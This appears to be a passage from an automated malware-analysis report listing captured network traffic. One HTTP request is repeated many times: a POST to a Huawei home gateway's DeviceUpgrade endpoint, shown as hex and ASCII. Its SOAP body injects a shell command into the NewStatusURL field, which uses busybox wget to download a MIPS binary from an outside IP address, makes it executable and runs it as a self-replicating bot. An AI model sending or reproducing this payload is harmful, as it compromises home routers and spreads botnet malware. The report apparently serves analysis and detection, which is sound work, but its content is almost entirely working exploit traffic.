75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 